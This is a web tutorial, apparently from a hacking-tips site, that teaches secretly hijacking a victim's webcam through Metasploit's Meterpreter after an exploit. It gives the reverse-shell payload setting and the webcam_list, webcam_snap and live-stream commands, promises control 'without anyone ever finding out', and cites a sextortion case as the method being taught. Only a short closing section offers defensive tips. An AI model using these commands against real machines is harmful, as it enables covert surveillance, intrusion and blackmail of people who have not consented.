In this tutorial, we’ll take a look at how we can hack into a webcam secretly and remotely over the internet and take a peek at what’s going on at the other side. We’ll use the powerful Meterpreter and Kali Linux to hack into the victim’s webcam. We’ll take full control of the webcam, turn it on, get snapshots and even stream live video without anyone ever finding out.

In early 2014, a hacker was sentenced to 18 months for doing just this to Miss Teen USA 2013. He found a vulnerability in her computer (like some outdated software), took a few compromising photos from the webcam and blackmailed the victim to send more photos. The method he used is exactly what we’ll be trying out here.

Our best friend meterpreter is going to help us with this hack. With Meterpreter we can control someone’s webcam, install a keylogger or plant your own viruses, steal private data and do pretty much anything on the victim’s computer.

For this tutorial, I’m assuming that you’ve already used an attack module to exploit a vulnerability using Metasploit (How to do this?). Now let’s get to it.

How to hack webcams?

Step 1: Set up meterpreter.

After we’ve successfully exploited the victim, we now have the option to set a payload of our choice. The payload tells metasploit what to do on the victim’s computer once it breaks in. Meterpreter is our payload. The following command sets up our payload:

set payload windows/meterpreter/reverse_tcp

If the attack was successful, metasploit automatically installs meterpreter on the target system and we can move on to hacking the webcam.

Step 2: Find the webcam.

Meterpreter has a built-in module for searching and controlling the remote system’s webcam. We can start off by searching if the system even has a webcam or not.me. The command below is used for that, it also returns us the name of the webcam.

meterpreter > webcam_list

And now you should see your target’s webcam(s) listed in the output.

Step 3: Take snapshots

If the last command gave us a webcam we can go ahead and snap a photo:

meterpreter > webcam_snap

And now you should see a picture has been saved in the folder /opt/framework3/msf3 Simply head over there

Step 4: Stream real time video from the hacked webcam

So we just took a picture, let’s see how to get a live video stream. We can do this by typing the command below: (We’re using –p parameter to specify the directory we want to give to the video streaming file)

meterpreter > run webcam -p /var/www

This command fires up the victim’s webcam and sends its video output to /var/www/webcam.htm. You can open up this file and check out what’s going on at the other end in a live video stream.

How to prevent your own webcam from being hacked?

There are several ways to hack into webcams. In the above example, with just a few small commands we can peek into our victim’s webcam. Any seasoned security expert will tell you that no system is completely secure. This is why you should always keep your cameras covered when not in use. Personally, I use this little gadget on both my laptop and smartphone.

Mark Zuckerberg has taped over his webcam for privacy
Even Mark Zuckerberg does it.

But this doesn’t mean that you shouldn’t bother keeping your operating system and applications updated, quite the opposite actually. If a hacker can gain control of your webcam, your system has been successfully exploited, it is effectively now a bot, a slave of the attacker. This means that the attacker can do anything on your system: access your private data, see anything you type as well as all the websites you visit.

What device are you using right now? A smartphone? A laptop? Chances are you’re staring directly at a camera. Are you suddenly feeling a little uneasy? You should. Don’t take any chances. If you simply cover up your cameras and routinely update all your software you can avoid being the victim of a webcam hack yourself.



Want to be a real hacker? Sign Up!



Recommended | All | New


go to top